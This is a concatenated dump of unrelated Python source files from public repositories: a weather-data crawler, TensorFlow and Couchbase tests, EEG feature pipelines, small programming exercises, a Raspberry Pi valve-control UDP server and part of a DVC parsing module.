d2ca79b04e4f33f3da1aacc21ab5523ec50d6cc0 | 6fa625feb79934951985ddfa3889886abbe0dc8e | /crawlers/ddgmuiWyoming/wyoming.py | 29a664e5f3caed892131c88183e08f5b65b083ba | [] | no_license | anukaisolutions/Vayudev | b539ab085aac1fd285953289f7bff9b47bfeb080 | 905f749d1678ab36211b1ead1dd005ce03221d72 | refs/heads/master | 2021-01-13T19:16:41.775458 | 2020-02-23T14:06:50 | 2020-02-23T14:06:50 | 242,467,839 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py |
def getData(year,month,form1,to,statio):
url = "http://weather.uwyo.edu/cgi-bin/sounding?region=seasia&TYPE=TEXT%3ARAW&YEAR="+year+"&MONTH="+month+"&FROM="+from1+"&TO="+to+"&STNM="+station
import requests
response = requests.get(url)
response = str(response.content)
# print(response.content)
name = "wyomingData/"+station+".txt"
file = open(name,'w')
for i in response[3:-1]:
if(i == '\\'):
file.write("\n")
elif(i == 'n'):
continue
else:
file.write(i)
file.close()
year = "2019"
month = "3"
from1 = "2700"
to = "2700"
stationCodes = ['42707','42101','42182','42339','42361','42379','42299','42314']
for station in stationCodes:
getData(year,month,from1,to,station)
| [
"[email protected]"
] | |
4bc1e9b731c78cf2eade21f26145cd1de06357af | 49536aafb22a77a6caf249c7fadef46d63d24dfe | /tensorflow/tensorflow/contrib/learn/python/learn/estimators/rnn_common_test.py | 5df08f5fdc138fbb912f8ebcd33bc37ce60bc5d2 | [
"Apache-2.0"
] | permissive | wangzhi01/deeplearning-1 | 4e5ad93f0d9ecd302b74352f80fe1fa6ae70bf0d | 46ab82253d956953b8aa98e97ceb6cd290e82288 | refs/heads/master | 2020-05-28T03:14:55.687567 | 2018-09-12T16:52:09 | 2018-09-12T16:52:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,952 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for layers.rnn_common."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.learn.python.learn.estimators import rnn_common
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.platform import test
class RnnCommonTest(test.TestCase):
def testMaskActivationsAndLabels(self):
"""Test `mask_activations_and_labels`."""
batch_size = 4
padded_length = 6
num_classes = 4
np.random.seed(1234)
sequence_length = np.random.randint(0, padded_length + 1, batch_size)
activations = np.random.rand(batch_size, padded_length, num_classes)
labels = np.random.randint(0, num_classes, [batch_size, padded_length])
(activations_masked_t,
labels_masked_t) = rnn_common.mask_activations_and_labels(
constant_op.constant(activations, dtype=dtypes.float32),
constant_op.constant(labels, dtype=dtypes.int32),
constant_op.constant(sequence_length, dtype=dtypes.int32))
with self.test_session() as sess:
activations_masked, labels_masked = sess.run(
[activations_masked_t, labels_masked_t])
expected_activations_shape = [sum(sequence_length), num_classes]
np.testing.assert_equal(
expected_activations_shape, activations_masked.shape,
'Wrong activations shape. Expected {}; got {}.'.format(
expected_activations_shape, activations_masked.shape))
expected_labels_shape = [sum(sequence_length)]
np.testing.assert_equal(expected_labels_shape, labels_masked.shape,
'Wrong labels shape. Expected {}; got {}.'.format(
expected_labels_shape, labels_masked.shape))
masked_index = 0
for i in range(batch_size):
for j in range(sequence_length[i]):
actual_activations = activations_masked[masked_index]
expected_activations = activations[i, j, :]
np.testing.assert_almost_equal(
expected_activations,
actual_activations,
err_msg='Unexpected logit value at index [{}, {}, :].'
' Expected {}; got {}.'.format(i, j, expected_activations,
actual_activations))
actual_labels = labels_masked[masked_index]
expected_labels = labels[i, j]
np.testing.assert_almost_equal(
expected_labels,
actual_labels,
err_msg='Unexpected logit value at index [{}, {}].'
' Expected {}; got {}.'.format(i, j, expected_labels,
actual_labels))
masked_index += 1
def testSelectLastActivations(self):
"""Test `select_last_activations`."""
batch_size = 4
padded_length = 6
num_classes = 4
np.random.seed(4444)
sequence_length = np.random.randint(0, padded_length + 1, batch_size)
activations = np.random.rand(batch_size, padded_length, num_classes)
last_activations_t = rnn_common.select_last_activations(
constant_op.constant(activations, dtype=dtypes.float32),
constant_op.constant(sequence_length, dtype=dtypes.int32))
with session.Session() as sess:
last_activations = sess.run(last_activations_t)
expected_activations_shape = [batch_size, num_classes]
np.testing.assert_equal(
expected_activations_shape, last_activations.shape,
'Wrong activations shape. Expected {}; got {}.'.format(
expected_activations_shape, last_activations.shape))
for i in range(batch_size):
actual_activations = last_activations[i, :]
expected_activations = activations[i, sequence_length[i] - 1, :]
np.testing.assert_almost_equal(
expected_activations,
actual_activations,
err_msg='Unexpected logit value at index [{}, :].'
' Expected {}; got {}.'.format(i, expected_activations,
actual_activations))
if __name__ == '__main__':
test.main()
| [
"[email protected]"
] | |
62bca78d93bc3f22a19ac5decef2c0c10190c48a | 5f36eba5cf27cda8198cad11f0486d379a5ca9f0 | /gen_features.py | f35b063158b60ce886115751c8f5d62fdfe819e8 | [
"MIT"
] | permissive | A-Jacobson/iEEG_Seizure_Prediction | 16354a67cb5c429935d1ce00f1c1647349ddb9ea | bdee7f4aab72674e01af7ec254b5d6ec7f65e620 | refs/heads/master | 2020-07-06T13:05:46.155605 | 2016-09-16T22:02:19 | 2016-09-16T22:02:19 | 67,307,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,760 | py | from pipeline import Pipeline
from eeg_io import load_data
from transforms import *
import multiprocessing as mp
pipelines = [
# statstical features
Pipeline([Mean()]),
Pipeline([Mean(), Abs()]),
Pipeline([Abs(), Mean()]),
Pipeline([Stats()]),
Pipeline([CorrelationMatrix()]),
# Pipeline([CorrelationMatrix(), Eigenvalues()]), # under construction
# time domain features
Pipeline([Resample(600)]),
Pipeline([LPF(5.0), Resample(600)]),
Pipeline([LPF(5.0), Interp(), Resample(600)]),
Pipeline([Interp(), Resample(600)]),
Pipeline([Resample(1200)]),
Pipeline([LPF(5.0), Resample(1200)]),
Pipeline([Interp(), Resample(1200)]),
# frequency domain features
Pipeline([FFT(), Slice(1, 48), Magnitude(), Log10()]),
Pipeline([FFT(), Slice(1, 64), Magnitude(), Log10()]),
Pipeline([FFT(), Slice(1, 96), Magnitude(), Log10()]),
Pipeline([FFT(), Slice(1, 128), Magnitude(), Log10()]),
Pipeline([FFT(), Slice(1, 160), Magnitude(), Log10()]),
# combination features (under construction)
# Pipeline([FFTWithTimeFreqCorrelation(1, 48, 400, 'usf')]),
# Pipeline([FFTWithTimeFreqCorrelation(1, 48, 400, 'usf')]),
# Image features
#Pipeline([SpectrogramImage(size=(224, 224, 3))]) # under construction
]
folders = ['train_1', 'test_1', 'train_2', 'test_2', 'train_3', 'test_3']
def gen_features(folder):
if 'train' in folder:
for p in pipelines:
X, y, files = load_data(folder)
p.to_file(X, files, folder, y)
else:
for p in pipelines:
X, files = load_data(folder)
p.to_file(X, files, folder)
if __name__ == '__main__':
processes = 6
p = mp.Pool(processes)
p.map(gen_features, folders)
| [
"[email protected]"
] | |
505e010e347cb6852cbd67ae05cfa5a801a854ef | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/88/usersdata/197/59698/submittedfiles/listas.py | 42280df62eb2e1e110c8e6ea113e2b5f83248d61 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | # -*- coding: utf-8 -*-
def degrau (a):
b=[]
for i in range (0,len(a)-1,1):
diferenca=(-1)*(a[i]-a[i+1])
b.append(diferenca)
return (b)
def maior (a):
maior=a[0]
for i in range (0,len(a),1):
if a[i]>maior:
maior=a[i]
return (maior)
def maiordegrau (lista):
b=degrau(lista)
m=maior(b)
return(m)
lista=[]
n=int(input('Digite o numero de elementos da lista:'))
for i in range (1,n+1,1):
valor=float(input('Digite o numero da lista:'))
lista.append(valor)
print(maiordegrau(lista)) | [
"[email protected]"
] | |
f4ffb83165231227b2683d436abb21d63dea3822 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /q7BdzRw4j7zFfFb4R_16.py | f9daf2b8e0b3ec99b99073498e00d7020dc7733f | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | """
Create a function that takes two lists and combines them by alternatingly
taking elements from each list in turn.
* The lists may be of different lengths, with at least one character / digit.
* The first list will contain string characters (lowercase, a-z).
* The second list will contain integers (all positive).
### Examples
merge_arrays(["a", "b", "c", "d", "e"], [1, 2, 3, 4, 5])
➞ ["a", 1, "b", 2, "c", 3, "d", 4, "e", 5]
merge_arrays([1, 2, 3], ["a", "b", "c", "d", "e", "f"])
➞ [1, "a", 2, "b", 3, "c", "d", "e", "f"]
merge_arrays(["f", "d", "w", "t"], [5, 3, 7, 8])
➞ ["f", 5, "d", 3, "w", 7, "t", 8]
### Notes
N/A
"""
def merge_arrays(a, b):
a_copy = list(a)
b_copy = list(b)
c = list()
if len(a) > len(b):
long_list = list(a)
else:
long_list = list(b)
for i in range(len(long_list)):
if a_copy:
c.append(a_copy.pop(0))
if b_copy:
c.append(b_copy.pop(0))
return c
| [
"[email protected]"
] | |
a9afdee321162791bb14de296c179bfd662c9631 | 46c31992b665615e410f1869b9f7a91ed57a2637 | /couchbase/tests/cases/rget_t.py | c7a8cd4db499d9584d590617ed33a4396847008a | [
"Apache-2.0"
] | permissive | what-studio/couchbase-python-client | 4bca31917a519ad2d61bc93f37faa7f4af81d32d | 1aa78f1559fe2407d664b7d5fd1f885359750147 | refs/heads/master | 2021-01-12T08:34:06.866811 | 2016-12-02T00:05:15 | 2016-12-02T16:31:24 | 76,612,814 | 1 | 1 | null | 2016-12-16T02:09:30 | 2016-12-16T02:09:29 | null | UTF-8 | Python | false | false | 3,351 | py | #
# Copyright 2013, Couchbase, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from couchbase.exceptions import NotFoundError, ArgumentError
from couchbase.tests.base import MockTestCase
from couchbase.mockserver import MockControlClient
class ReplicaGetTest(MockTestCase):
def setUp(self):
super(ReplicaGetTest, self).setUp()
self.skipUnlessMock()
self.skipLcbMin("2.0.7")
self.mockclient = MockControlClient(self.mock.rest_port)
def test_get_kw(self):
key = self.gen_key("get_kw")
# Set on all replicas
self.mockclient.cache(key,
on_master=False,
replica_count=self.mock.replicas,
value=99,
cas=1234)
self.assertRaises(NotFoundError,
self.cb.get, key)
rv = self.cb.get(key, replica=True)
self.assertTrue(rv.success)
self.assertEqual(rv.value, 99)
def _check_single_replica(self, ix):
key = self.gen_key("get_kw_ix")
# Ensure the key is removed...
self.mockclient.purge(key,
on_master=True,
replica_count=self.mock.replicas)
# Getting it should raise an error
self.assertRaises(NotFoundError, self.cb.get, key)
# So should getting it from any replica
self.assertRaises(NotFoundError, self.cb.rget, key)
# And so should getting it from a specific index
for jx in range(self.mock.replicas):
self.assertRaises(NotFoundError, self.cb.rget, key,
replica_index=jx)
# Store the key on the desired replica
self.mockclient.cache(key,
on_master=False,
replicas=[ix],
value=ix,
cas=12345)
# Getting it from a replica should ultimately succeed
self.cb.get(key, replica=True)
rv = self.cb.rget(key)
self.assertTrue(rv.success)
self.assertEqual(rv.value, ix)
# Getting it from our specified replica should succeed
rv = self.cb.rget(key, replica_index=ix)
self.assertTrue(rv.success)
self.assertEqual(rv.value, ix)
# Getting it from any other replica should fail
for jx in range(self.mock.replicas):
if jx == ix:
continue
self.assertRaises(NotFoundError,
self.cb.rget,
key,
replica_index=jx)
def test_get_ix(self):
key = self.gen_key("get_kw_ix")
for ix in range(self.mock.replicas):
self._check_single_replica(ix)
| [
"[email protected]"
] | |
43196f723a7336bcf3a95d9474d07b8fbaf707fd | e72c937f783e79f41468d992fead4e2085de1775 | /src/week 4/day 3/using_object_main.py | 159e6f58b74160936df6aa2ce755b28005e8a72b | [] | no_license | NoroffNIS/Python_Examples | 13dac7313472a9cdefe66a61302f4024a4a8af0f | ffab09002d3549e6f440a303fccc0fd61bb80472 | refs/heads/master | 2021-04-26T06:04:33.034864 | 2018-01-03T13:26:19 | 2018-01-03T13:26:19 | 59,116,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | from objects import *
my_object = ClassName
print(my_object.__doc__)
print(my_object.class_variable)
my_object.class_method(my_object)
my_object.print_class_variable(my_object)
| [
"[email protected]"
] | |
60154e9f98b90231bbbe31299e779005708de9c8 | df42b0d05038a2940606591d548637bc51d6573d | /aid1907/leetcode_test/最大柱状矩阵/new_test.py | 035a46bb7169dbdb17830bdebe6ff12994a3581e | [] | no_license | ThreePointFive/aid1907_0814 | 440113f5ae2df28e53a088bd3ea420d5558214b4 | 99eea9aafdf8211278425c33aba2e64d5eb2500b | refs/heads/master | 2022-12-03T19:31:21.085608 | 2019-11-09T06:25:33 | 2019-11-09T06:25:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,265 | py | import time
def max_j(heights):
if heights == []:
return 0
list2=[]
for i in range(len(heights)):
list1=[]
for j in range(i,len(heights)):
list1.append((j-i+1)*min(heights[i:j+1]))
list2.append(max(list1))
return max(list2)
a=time.time()
list3=max_j([9046155,17522430,44186957,40374643,77652689,89027934,97586333,68834337,62979669,1783127,29339118,83907628,48067922,22843915,11027247,73603247,32376863,12448072,7086475,2369889,5064817,88893600,61558880,77108330,32113014,21324782,28294417,18403046,39022240,58687324,80978280,584748,76209754,25165237,40959391,6378795,66709524,38545724,75213133,29689193,92845203,4552251,13596821,40913125,27396166,24624068,67032725,12289382,89588493,74119200,14659271,94653310,15529152,28734503,24277993,47642166,50059286,52572410,18561565,89081526,11259734,99539845,42182626,39985840,24705083,83142017,46364635,43930959,74204093,74094120,73620152,67049296,31162724,87216973,7962422,58558890,64357394,27511499,23364624,53945887,1630699,38023896,1115549,69676203,66758399,25393542,17318370,16817685,30482304,88396287,58415564,94258390,87936132,598190,34244230,65157567,36256560,80608866,9088526,10460653,7219338,82708678,77509950,38382062,22442004,37988724,49457305,39315750,65500223,72821929,93261637,19647274,63362177,46893538,89323477,30120577,24803433,59158199,99454614,55285737,47554486,10386530,2060480,88006971,63501073,36304710,53164538,99757633,69429928,14769417,62734638,76649267,49994447,40244588,15031329,24952803,30749664,64488634,64268553,48766239,89826916,10046542,68413513,53189093,56940081,10253343,83309670,81743514,69411542,35280637,89545603,69482381,98183519,91606083,57489352,61684592,27910794,63170242,13958577,49857074,30456011,76693216,26506341,80450459,69454156,94054023,5403262,52720173,11059009,22188168,1486412,885925,32234710,22416278,54075019,89174791,32669621,89901041,23434657,54597515,77698030,65496613,24079896,75881550,57102696,34085600,90082494,37529842,97255843,4041072,87386917,27711854,33250640,66409610,60678665,2704796,60463633,18598280,7941321,24038995,40786448,9427734,24924920,73021158,31844012,31516291,14712302,17029985,21417333,38146959,71627500,99115363,56159924,48223749,27513265,13262621,82309349,17595760,50792463,32081544,74153184,90695732,12309751,7403824,57105343,72988416,62624972,70085328,91586696,70566294,94124323,32373144,32510380,71565596,57910655,16870744,3081887,72622957,33900729,24499220,63286268,5528229,76130936,19446193,6268330,56160553,85225166,88577680,73756313,36017629,20659224,425849,79229714,32968975,60346025,88851409,58473744,22970998,58936737,50060440,46053644,5577413,34949937,31080376,77143009,92860592,47951120,80224896,65483549,81851849,57240469,81286169,39896430,85887757,732362,46164761,42048310,38473880,87258793,68320976,74491510,7918017,68746825,6237576,93403345,29092851,95088985,51877089,4580201,6542074,54453881,3150197,12119487,89403818,34230573,89262496,82264410,34698045,22003745,264311,16549894,31760566,81550481,8962676,70164675,34799195,7643789,64729337,73273076,94902582,85566665,280938,2820600,6829843,59034866,48740297,88439046,54123851,617386,45535599,60665925,7587619,48685796,72785413,96991438,35432721,14564261,31772200,70130766,89084358,32036512,39197012,73361276,66103345,48159688,96042303,53418892,55803478,13287993,26691968,3222412,98854658,79489258,6043012,5684501,38524124,7299661,94123547,45164327,60433399,39659146,5830253,68021019,40861294,31132018,65012457,76294015,98212631,96784657,98941133,39813342,81337521,38138145,65690970,47440866,38814186,61733274,53376111,47134016,75021267,32584431,50356428,26392277,12073690,8915793,32076779,3114166,16215454,78716678,794846,76648854,70892177,6625099,44669873,64269823,90273469,62198682,93080191,41002452,11499691,92021324,80815794,92837213,82675822,46506765,92794431,21490008,60756391,46170542,68624024,88294010,78754974,18980452,14686287,43345016,80412597,99279418,98975534,96628052,77996097,99770380,73276906,1404626,58911831,70463131,65674449,49185300,32661813,58754640,42704105,44161504,3292317,23519899,89515069,85968139,22543016,82309501,7458147,35815759,80996395,28598523,24109769,12267721,95327,91312409,8129089,80507925,90591827,7104624,77135977,21104276,59391356,2929235,22508902,18303188,73392366,40699704,20004840,6054179,51970696,62708945,2732035,55263013,38745197,92247105,93747504,13804565,27072958,53722003,2136677,8069353,82320526,26246446,72853427,82415854,70075207,80982516,15440131,60667035,40603492,45092460,81771311,99994849,48021695,56796566,70814389,21414061,50012622,43335581,79984592,1983318,6044527,35232979,9762684,97306076,27480084,3510188,63626993,7069394,57232192,65763670,15138748,92069070,44526469,40508527,27001276,14601676,21491043,42441407,75268711,14610888,40050219,9556375,67122089,88071914,66352941,37936478,62002327,16365563,81272059,94503271,70865233,39832938,29736251,33144269,37139014,9732687,89170810,53282360,16802082,46403002,19046030,84457182,90988424,63572499,24965709,17989701,30690528,98973104,12947460,5959239,13583992,52997680,68031966,80706081,93585946,34384907,71158911,8104626,3266822,52430971,2607897,26648408,44780261,32344148,59792677,34435628,42076836,48963487,87717988,11395270,47882841,59280370,95852452,91387618,75369222,20818161,61893671,6059750,19791265,74841131,64535341,85891610,80355163,32567308,19114043,26457462,19468567,42789307,34562088,75251742,95220278,37169985,1900150,92516891,22030486,14209179,26952519,16623674,15689019,67186859,28018944,63571860,26467230,23871396,54959478,1836452,97205909,16853149,60412554,69513526,44210633,24947895,55405136,77082148,10031555,27035532,56055962,82016475,69824839,90618050,57268217,17561469,80304388,11684719,10078360,2334874,78410250,89547232,71474900,94099269,56734091,99493844,10187482,35717673,23365240,65146960,37554125,73087501,34516462,50483031,42601027,31243447,27947279,50522516,60841947,37978834,77558048,16897910,19995309,47382887,60032312,29779878,17460708,40336700,93980949,80055420,95187926,72391200,69602652,66662826,19006821,78853096,66156670,29194303,14570769,42038262,46857616,4641247,15125763,33890430,55124278,57726791,65133877,83071557,8249307,78492176,73566744,38323707,95390086,46078405,38222946,55422399,75858284,55683654,95759099,22355585,35739074,43463378,47263137,57858079,10126204,66269959,89227527,76282875,47980614,3798296,70837489,94838230,60955895,85963253,28728660,68596526,96206396,46378889,4184435,56972055,24871066,77751179,95295762,20261152,76345937,33518708,28199903,4720573,89202362,76475355,27076158,77457788,19938733,26855648,87832219,30064937,93125607,77059746,58864164,41106221,33374395,82218006,88460804,94330290,68181259,69705816,15443168,16904007,16084706,19627604,73876062,93472124,49895135,69171824,66249628,26241072,2690532,94449532,83477997,44409246,23441239,10554156,74383386,43379972,37409804,14731958,25961261,83051763,91791704,37341778,76674336,77682451,19559784,65135140,72012742,40257395,34840957,39972262,57161402,3442015,12116218,31037464,96914139,62011354,52725640,63163767,40768778,55416172,10129651,24246776,52341770,33570890,87317284,26725156,29467214,77243440,41457114,55428476,60295203,85765171,45286606,36969539,63447622,64846390,54621032,87976716,57620137,41978341,27948979,14781539,45420356,40065197,98335355,94850847,54592903,51060995,58014614,47878034,58993519,20660618,72124810,11335289,54231508,11958446,90576797,83698723,89201886,84550264,91643551,2013441,22831787,36930157,38982980,86279409,54292899,46120364,26772478,11913036,40615057,7237809,79210927,38551765,99819358,77546282,33402612,54412262,81123629,43933579,2290296,40117148,64594197,26931458,3968789,18825705,38889904,94545586,55040780,80608142,31612202,46684331,82621583,54443989,83614488,74120915,40723399,90423739,20241280,20012229,2336775,60856337,27250038,34064054,99408103,27069396,11610336,85327067,33998010,45250317,29260646,88804658,85367465,46371195,15736116,89336254,17713253,7142372,36398193,72754033,87750514,68010395,19438365,70372097,22454385,3052853,44493013,15694136,93476593,17250645,35706365,48329720,30623334,15472755,82393775,82547789,95058503,46520463,20391209,29056514,91770781,2168207,70377524,29654598,48539403,38629993,71507205,66252656,45772365,7905398,39006689,86039232,75915793,58445054,8927681,98370178,14014260,5937046,66580666,60007205,75704043,2287031,60853277,6327378,70276138,95763404,41391519,65334642,42283868,61782728,46907508,86571001,63950936,17285032,68741951,12490339,55915025,40249156,31259347,54203743,670906,70266036,92759327,76586700,81227443,1687008,27473230,47758055,7624055,94053897,60281612,35844450,48857280,21134889,42171828,71649771,69414646,36079700,36984413,64214866,97862428,36408273,3302219,61813364,6209657,72044170,26820055,14641035,64809679,58079402,68844778,65480585,80861791,61604105,94583637,14605586,15807465,22056868,62363641,75947872,68627117,75161605,11792323,70000749,96296494,6480503,41650520,18227492,42560203,31151285,82442358,40422632,67559558,85744577,54752348,26285568,10305100,81572404,40926603,75114779,92168158,62287733,40595364,73029949,76408190,35179002,87635535,92215655,9752222,2515528,68163528,78379339,77677133,32472203,48380088,26489980,38952706,90030609,44717472,81512910,73698246,27159831,74451894,41257805,65420760])
print(time.time()-a,list3)
# list1=[1,5,6,4]
# print(min(list1[1:3])) | [
"[email protected]"
] | |
7b1f66dd10d8d19462a808b9915411777c07b644 | e1292fb9f2b359f71fbc54a4eb6ae4cf0c1ff51d | /machines/rasppi32/socket_server.py | 18c67fe41ecbe2ebc0ace9dc89691c92450be8f2 | [] | no_license | JNRiedel/PyExpLabSys | 879d5c6bf552e89134629f0c6ca011af67937c3d | b69daaa9c932b9264d9f731cc3f2091f31f5d36e | refs/heads/master | 2020-04-08T08:45:17.466865 | 2014-08-22T11:06:24 | 2014-08-22T11:06:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,797 | py | """ Socket server for valve-control box """
import time
import SocketServer
import wiringpi2 as wp
class MyUDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
received_data = self.request[0].strip()
data = "test"
socket = self.request[1]
if received_data == "read":
print "read_all"
data = ''
for i in range(0, 20):
data += str(wp.digitalRead(i))
for i in range(0, 9):
if (received_data[0:11] == "set_state_" + str(i + 1)):
val = received_data[11:].strip()
if val == '0':
wp.digitalWrite(i, 0)
data = "ok"
if val == '1':
wp.digitalWrite(i, 1)
data = "ok"
for i in range(9, 20):
if (received_data[0:12] == "set_state_" + str(i + 1)):
val = received_data[12:].strip()
if val == '0':
wp.digitalWrite(i, 0)
data = "ok"
if val == '1':
wp.digitalWrite(i, 1)
data = "ok"
socket.sendto(data, self.client_address)
if __name__ == "__main__":
wp.wiringPiSetup()
time.sleep(1)
for index in range(0, 21): # Set GPIO pins to output
wp.pinMode(index, 1)
wp.digitalWrite(index, 0)
# Now that all output are low, we can open main safety output
wp.digitalWrite(20, 1)
for index in range(0, 21): # Set GPIO pins to output
wp.digitalWrite(index, 1)
HOST, PORT = "10.54.7.32", 9999 # Rasppi33
server = SocketServer.UDPServer((HOST, PORT), MyUDPHandler)
server.serve_forever()
| [
"[email protected]"
] | |
18764b8e0e245a262c3d95f37922342280da279e | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/agc015/B/4420123.py | e240646ff0645ed09389907878e7f5bc4ba5d2a1 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | s = input()
n = len(s)
ans = 0
for i, c in enumerate(s):
ans += n-1
if c == "U":
ans += i
else:
ans += n-1 - i
print(ans) | [
"[email protected]"
] | |
3acd29f1a10016eb1f86cb5cf195ad30bb94dd36 | e79de9c9def60b0f814ab0625a2eb8bce3428ddd | /challenges/own/operas/operas_solution.py | 0f21f23d8e6186991dd3ca538f90015a1629a287 | [] | no_license | mh70cz/py_old | a80e2140a279541c3639f89df70fadad34f7df0f | 1af878cfbff24e5c6d39219c2c4faebd5a12f0c4 | refs/heads/master | 2022-04-05T15:07:10.840387 | 2020-01-13T18:39:50 | 2020-01-13T18:39:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,202 | py | """
For two given composers find operas (one of composers is the author)
at which premiere both could have been together (i.e. they both had to be alive).
Just a theoretical possibility of presence is considered
"""
from datetime import datetime
composers = {
"beethoven": ("Ludwig van Beethoven", "17 December 1770", "26 March 1827"),
"wagner": ("Richard Wagner", "22 May 1813", "13 February 1883"),
"verdi": ("Giuseppe Verdi", "9 October 1813", "27 January 1901"),
"mozart": ("Wolfgang Amadeus Mozart", "27 January 1756", "5 December 1791"),
}
operas = [
("mozart", "Apollo and Hyacinth", "13 May 1767"),
("mozart", "Marriage of Figaro", "1 May 1786"),
("mozart", "Don Giovanni", "29 October 1787"),
("mozart", "Così fan tutte", "6 January 1790"),
("mozart", "The Clemency of Titus", "6 September 1791"),
("mozart", "The Magic Flute", "30 September 1791"),
("wagner", "The Fairies", "29 June 1888"),
("wagner", "Rienzi", "20 October 1842"),
("wagner", "The Flying Dutchman", "2 January 1843"),
("wagner", "Tannhäuser", "19 October 1845"),
("wagner", "Lohengrin", "28 August 1850"),
("wagner", "The Rhinegold", "22 September 1869"),
("wagner", "The Valkyrie", "26 June 1870"),
("wagner", "Siegfried", "16 August 1876"),
("wagner", "Twilight of the Gods", "17 August 1876"),
("wagner", "Tristan and Isolde", "10 June 1865"),
("wagner", "The Master-Singers of Nuremberg", "21 June 1868"),
("wagner", "Parsifal", "26 July 1882"),
("beethoven", "Fidelio", "20 November 1805"),
("verdi", "Nabucco", "9 March 1842"),
("verdi", "Ernani", "9 March 1844"),
("verdi", "Macbeth", "14 March 1847"),
("verdi", "Il corsaro", "25 October 1848"),
("verdi", "Rigoletto", "11 March 1851"),
("verdi", "La traviata", "6 March 1853"),
("verdi", "Aroldo", "16 August 1857"),
("verdi", "Macbeth", "21 April 1865"),
("verdi", "Don Carlos", "11 March 1867"),
("verdi", "Aida", "24 December 1871"),
("verdi", "Otello", "5 February 1887"),
("verdi", "Falstaff", "9 February 1893"),
]
def _get_date(date_str):
return datetime.date(datetime.strptime(date_str, "%d %B %Y"))
def operas_both_at_premiere(guest, composer, operas=operas):
""" Returns a list of operas,
where the guest and the composer could have been together at premiere.
Args:
guest (str): one of the composers but not the author of an opera
composer (str): the author of an opera
operas (list): list of operas
Returns a list of titles of operas.
"""
if guest not in composers.keys():
raise ValueError("guest is not in composers")
if composer not in composers.keys():
raise ValueError("composer is not in composers")
at_premiere = []
guest_born = _get_date(composers[guest][1])
guest_died = _get_date(composers[guest][2])
composer_died = _get_date(composers[composer][2])
for opera in operas:
if opera[0] == composer:
premiere = _get_date(opera[2])
if (guest_born < premiere < guest_died) and (premiere < composer_died):
at_premiere.append(opera[1])
return at_premiere
| [
"[email protected]"
] | |
a643359cdc06e3dad758fb3aebf4acc8e8ccfee6 | 5e48c355308cfe3fe84835f3d56218a53f7968cd | /dvc/parsing/__init__.py | b173de4384e38b7898d811d2d2e19cb55d2b293d | [
"Apache-2.0"
] | permissive | imhardikj/dvc | 97b6637f75d90e9f3f708211aec07e3da2fa205f | 911534116e4f870f87b05caf2bed38e105a205ad | refs/heads/master | 2023-01-05T04:01:46.308634 | 2020-10-29T09:01:34 | 2020-10-29T09:01:34 | 264,737,803 | 0 | 0 | Apache-2.0 | 2020-05-17T19:08:07 | 2020-05-17T19:08:06 | null | UTF-8 | Python | false | false | 3,764 | py | import logging
import os
from collections import defaultdict
from copy import deepcopy
from itertools import starmap
from typing import TYPE_CHECKING
from funcy import first, join
from dvc.dependency.param import ParamsDependency
from dvc.path_info import PathInfo
from dvc.utils.serialize import dumps_yaml
from .context import Context
from .interpolate import resolve
if TYPE_CHECKING:
from dvc.repo import Repo
logger = logging.getLogger(__name__)
STAGES_KWD = "stages"
USE_KWD = "use"
VARS_KWD = "vars"
WDIR_KWD = "wdir"
DEFAULT_PARAMS_FILE = ParamsDependency.DEFAULT_PARAMS_FILE
PARAMS_KWD = "params"
class DataResolver:
def __init__(self, repo: "Repo", wdir: PathInfo, d: dict):
to_import: PathInfo = wdir / d.get(USE_KWD, DEFAULT_PARAMS_FILE)
vars_ = d.get(VARS_KWD, {})
vars_ctx = Context(vars_)
if os.path.exists(to_import):
self.global_ctx_source = to_import
self.global_ctx = Context.load_from(repo.tree, str(to_import))
else:
self.global_ctx = Context()
self.global_ctx_source = None
logger.debug(
"%s does not exist, it won't be used in parametrization",
to_import,
)
